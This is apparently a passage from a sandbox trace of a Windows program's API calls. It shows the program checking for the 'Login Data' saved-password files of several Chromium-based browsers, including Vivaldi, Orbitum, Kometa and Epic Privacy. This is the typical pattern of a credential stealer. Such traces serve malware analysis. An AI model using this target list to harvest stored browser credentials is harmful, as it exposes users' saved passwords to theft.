lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.513] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Login Data", lpFilePart=0x0) returned 0x43 [0237.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.513] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CocCoc\\Browser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coccoc\\browser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.513] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3a [0237.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\elements browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.514] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4d [0237.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\elements browser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.514] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Login Data", lpFilePart=0x0) returned 0x45 [0237.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Elements Browser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\elements browser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.514] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3e [0237.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\epic privacy browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.515] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x51 [0237.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.515] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\epic privacy browser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.515] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Login Data", lpFilePart=0x0) returned 0x49 [0237.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.515] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\epic privacy browser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.515] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x30 [0237.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.515] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\kometa\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.515] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x43 [0237.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.516] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\kometa\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.516] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Login Data", lpFilePart=0x0) returned 0x3b [0237.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.516] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Kometa\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\kometa\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.516] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x31 [0237.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.516] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\orbitum\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.516] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x44 [0237.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\orbitum\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.517] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Login Data", lpFilePart=0x0) returned 0x3c [0237.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Orbitum\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\orbitum\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.517] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x39 [0237.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\sputnik\\sputnik\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.517] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4c [0237.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\sputnik\\sputnik\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.518] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Login Data", lpFilePart=0x0) returned 0x44 [0237.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\sputnik\\sputnik\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.518] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x38 [0237.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\ucozmedia\\uran\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.518] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4b [0237.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\ucozmedia\\uran\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.518] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Login Data", lpFilePart=0x0) returned 0x43 [0237.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\ucozmedia\\uran\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.519] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x31 [0237.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\vivaldi\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.519] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x44 [0237.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\vivaldi\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.519] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Login Data", lpFilePart=0x0) returned 0x3c [0237.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Vivaldi\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\vivaldi\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.520] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x55 [0237.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.520] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data", lpFilePart=0x0) returned 0x68 [0237.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 